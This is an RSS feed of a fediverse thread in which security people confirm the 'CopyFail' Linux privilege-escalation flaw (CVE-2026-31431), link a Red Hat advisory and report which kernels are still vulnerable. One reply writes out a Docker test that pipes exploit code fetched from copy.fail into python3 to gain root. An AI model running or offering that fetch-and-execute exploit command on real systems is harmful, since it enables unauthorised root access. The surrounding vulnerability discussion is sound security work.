<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Yeah I tested CopyFail.]]></title><description><![CDATA[<p>Yeah I tested CopyFail. It's real. Yikes.</p><p></p><div class="card col-md-9 col-lg-6 position-relative link-preview p-0">



<a href="https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distribution/342" title="Copy Fail: 732 Bytes to Root on Every Major Linux Distribution">
<img src="https://discourse.ifin.network/uploads/default/optimized/1X/7b5ab8f12b5d9f627f86ecabbb08986d0d0f6184_2_1024x537.png" class="card-img-top not-responsive" style="max-height:15rem" alt="Link Preview Image" />
</a>



<div class="card-body">
<h5 class="card-title">
<a href="https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distribution/342">
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution
</a>
</h5>
<p class="card-text line-clamp-3">CVE-2026-31431 




Confirmed the exploit. It’s real.</p>
</div>
<a href="https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distribution/342" class="card-footer text-body-secondary small d-flex gap-2 align-items-center lh-2">



<img src="https://discourse.ifin.network/uploads/default/optimized/1X/ea367a05f4a0d090bf61d140dc84f744c9ab9bf0_2_32x32.png" alt="favicon" class="not-responsive overflow-hiddden" style="max-width:21px;max-height:21px" />





<p class="d-inline-block text-truncate mb-0">IFIN <span class="text-secondary">(discourse.ifin.network)</span></p>
</a>
</div><p></p>]]></description><link>https://board.circlewithadot.net/topic/ce2d97b5-dd4a-43f1-8033-f054adaf13e0/yeah-i-tested-copyfail.</link><generator>RSS for Node</generator><lastBuildDate>Fri, 15 May 2026 05:07:33 GMT</lastBuildDate><atom:link href="https://board.circlewithadot.net/topic/ce2d97b5-dd4a-43f1-8033-f054adaf13e0.rss" rel="self" type="application/rss+xml"/><pubDate>Wed, 29 Apr 2026 18:49:57 GMT</pubDate><ttl>60</ttl><item><title><![CDATA[Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 23:17:26 GMT]]></title><description><![CDATA[<p><span><a href="/user/mttaggart%40infosec.exchange">@<span>mttaggart</span></a></span> </p><p>Editing to add:</p><p>RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.</p><p>Looks like it requires a local user account, with a password set, to exploit, yes?</p><p></p><div class="card col-md-9 col-lg-6 position-relative link-preview p-0">



<a href="https://access.redhat.com/security/cve/cve-2026-31431" title="cve-details">
<img src="https://access.redhat.com/chrome_themes/nimbus/img/red-hat-customer-portal.svg" class="card-img-top not-responsive" style="max-height:15rem" alt="Link Preview Image" />
</a>





<div class="card-body">
<h5 class="card-title">
<a href="https://access.redhat.com/security/cve/cve-2026-31431">
cve-details
</a>
</h5>
<p class="card-text line-clamp-3"></p>
</div>
<a href="https://access.redhat.com/security/cve/cve-2026-31431" class="card-footer text-body-secondary small d-flex gap-2 align-items-center lh-2">



<img src="https://access.redhat.com/favicon.ico" alt="favicon" class="not-responsive overflow-hiddden" style="max-width:21px;max-height:21px" />



<p class="d-inline-block text-truncate mb-0"> <span class="text-secondary">(access.redhat.com)</span></p>
</a>
</div><p></p>]]></description><link>https://board.circlewithadot.net/post/https://infosec.exchange/users/Emily/statuses/116489896125281287</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://infosec.exchange/users/Emily/statuses/116489896125281287</guid><dc:creator><![CDATA[emily@infosec.exchange]]></dc:creator><pubDate>Wed, 29 Apr 2026 23:17:26 GMT</pubDate></item><item><title><![CDATA[Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 19:49:21 GMT]]></title><description><![CDATA[<p><span><a href="/user/mttaggart%40infosec.exchange">@<span>mttaggart</span></a></span> Debian 13 still vulnerable with 6.12.74</p>]]></description><link>https://board.circlewithadot.net/post/https://chaos.social/users/AgentK/statuses/116489726285958216</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://chaos.social/users/AgentK/statuses/116489726285958216</guid><dc:creator><![CDATA[agentk@chaos.social]]></dc:creator><pubDate>Wed, 29 Apr 2026 19:49:21 GMT</pubDate></item><item><title><![CDATA[Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 19:02:00 GMT]]></title><description><![CDATA[<p><span><a href="/user/mttaggart%40infosec.exchange">@<span>mttaggart</span></a></span> tested it in a docker image (used Noble as the LTS releases have patched kernels already):</p><p>```<br />host $ docker run --rm -it ubuntu:noble<br />container # apt update &amp;&amp; apt install curl python3<br />container # su ubuntu<br />container $ curl <a href="https://copy.fail/exp" rel="nofollow noopener"><span>https://</span><span>copy.fail/exp</span><span></span></a> | python3 &amp;&amp; su<br />container #<br />```</p><p>I'd say this is a welp of considerable magnitude</p>]]></description><link>https://board.circlewithadot.net/post/https://hachyderm.io/users/aburka/statuses/116489540103291115</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://hachyderm.io/users/aburka/statuses/116489540103291115</guid><dc:creator><![CDATA[aburka@hachyderm.io]]></dc:creator><pubDate>Wed, 29 Apr 2026 19:02:00 GMT</pubDate></item><item><title><![CDATA[Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 18:51:44 GMT]]></title><description><![CDATA[<p><span><a href="/user/mttaggart%40infosec.exchange">@<span>mttaggart</span></a></span> Can't privesc me if I always run as root!</p>]]></description><link>https://board.circlewithadot.net/post/https://infosec.exchange/users/JSCybersec/statuses/116489499747571348</link><guid isPermaLink="true">https://board.circlewithadot.net/post/https://infosec.exchange/users/JSCybersec/statuses/116489499747571348</guid><dc:creator><![CDATA[jscybersec@infosec.exchange]]></dc:creator><pubDate>Wed, 29 Apr 2026 18:51:44 GMT</pubDate></item></channel></rss>